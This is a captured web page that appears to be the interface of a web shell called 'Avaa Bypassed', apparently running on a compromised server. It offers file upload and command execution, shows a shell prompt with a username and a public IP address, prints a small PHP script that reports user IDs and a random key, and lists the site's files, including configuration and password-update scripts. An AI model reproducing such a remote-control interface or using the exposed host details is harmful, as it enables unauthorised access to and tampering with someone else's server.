[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.224.44.207: ~ $
<?php

$owner = function_exists('posix_getuid') ? posix_getuid() : 0;
$group = function_exists('posix_getegid') ? posix_getegid() : 0;
echo '\<owner>'.$owner.'</owner>';
echo '\<group>'.$group.'</group>';

// this is to handle secret key generation
$SecretKey = __generateSecretKey();
echo '\<secretkey>'.$SecretKey.'</secretkey>';

function __generateSecretKey()
{
	if (!function_exists('random_bytes')) {
		return uniqid() . substr(md5(rand()), 0, 4);
	}
	return bin2hex(random_bytes(16));
}

?>

Filemanager

Name Type Size Permission Actions
images Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
php82 Folder 0755
_config.php File 49 B 0644
_edit.php File 4.28 KB 0644
_edit.xml File 433 B 0644
clone.php File 5.75 KB 0644
config-internal.php File 1.07 KB 0644
config.php File 8.41 KB 0644
extend.php File 8.75 KB 0644
fileindex.php File 219 B 0644
getuid.php File 497 B 0644
import.php File 3.09 KB 0644
info.xml File 5.37 KB 0644
install.js File 924 B 0644
install.php File 9.42 KB 0644
install.xml File 2.02 KB 0644
md5 File 1.15 KB 0644
notes.txt File 858 B 0644
update_pass.php File 1.04 KB 0644